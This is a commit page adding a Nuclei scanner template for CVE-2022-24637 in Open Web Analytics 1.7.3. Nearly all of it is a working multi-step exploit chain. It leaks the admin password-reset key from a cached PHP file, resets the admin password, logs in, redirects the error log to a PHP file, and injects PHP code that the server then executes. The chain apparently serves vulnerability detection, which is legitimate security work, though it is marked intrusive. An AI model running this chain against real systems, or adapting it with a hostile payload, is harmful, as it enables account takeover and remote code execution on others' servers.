Merge pull request #10773 from projectdiscovery/CVE-2022-24637

Create CVE-2022-24637.yaml
2024-09-19 10:10:39 +04:00 · 2024-09-19 10:10:39 +04:00 · 5870294b5f
parent a98cefb654 9217402147
commit 5870294b5f
1 changed files with 166 additions and 0 deletions
--- a/http/cves/2022/CVE-2022-24637.yaml
+++ b/http/cves/2022/CVE-2022-24637.yaml
@ -0,0 +1,166 @@
+id: CVE-2022-24637
+
+info:
+  name: Open Web Analytics 1.7.3 - Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
+  reference:
+    - https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/open_web_analytics_rce.rb
+    - http://packetstormsecurity.com/files/171389/Open-Web-Analytics-1.7.3-Remote-Code-Execution.html
+    - https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4
+    - https://github.com/Pflegusch/CVE-2022-24637
+    - https://github.com/c0derpwner/HTB-pwned
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-24637
+    cwe-id: CWE-269
+    epss-score: 0.84852
+    epss-percentile: 0.98585
+    cpe: cpe:2.3:a:openwebanalytics:open_web_analytics:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 6
+    vendor: openwebanalytics
+    product: open_web_analytics
+    shodan-query: cpe:"cpe:2.3:a:openwebanalytics:open_web_analytics"
+  tags: cve,cve2022,packetstorm,rce,intrusive,open-web-analytics
+
+variables:
+  password: "{{randbase(8)}}@123!"
+  secret: "{{randstr}}"
+  secret_b64: "{{base64(secret)}}"
+
+flow: |
+  http(1);
+  http(2);
+  javascript();
+  http(3);
+  http(4); http(5); http(6); http(7);
+
+javascript:
+  - code: |
+          idx=serobj.indexOf('temp_passkey');
+          passubstr=serobj.substring(idx,idx+120);
+          temp_pass=(passubstr.match(/s:32:"([a-f0-9]{32})"/)[1])
+          temp_pass
+
+    args:
+      serobj: "{{base64_decode(serializedobj)}}"
+
+http:
+  - raw:
+      - |
+        POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_user_id=admin&owa_password=wrong+password+xyz&owa_go=&owa_action=base.login&owa_submit_btn=Login
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Login Failed"
+        internal: true
+
+  - raw:
+      - |
+        GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        name: serializedobj
+        internal: true
+        regex:
+          - '<\?php\\n\/\*([A-Za-z0-9=]+)\*\/\\n\?>'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - <?php\n
+        internal: true
+
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_password={{password}}&owa_password2={{password}}&owa_k={{javascript_response}}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(location,'owa_status_code=3006')"
+          - "status_code==302"
+        internal: true
+        condition: and
+
+  - raw:
+      - |
+        POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_user_id=admin&owa_password={{password}}&owa_go=&owa_action=base.login&owa_submit_btn=Login
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(set_cookie,'owa_p')"
+          - "status_code==302"
+        internal: true
+        condition: and
+
+  - raw:
+      - |
+        GET /index.php?owa_do=base.optionsGeneral HTTP/1.1
+        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        name: nonce
+        internal: true
+        regex:
+          - 'name="owa_nonce" value="([a-z0-9]+)">'
+
+  - raw:
+      - |
+        POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2
+
+  - raw:
+      - |
+        POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]=<?php+echo base64_decode('{{secret_b64}}');?>
+
+      - |
+        GET /owa-data/caches/{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '[debug_log]'
+          - "{{secret}}"
+        condition: and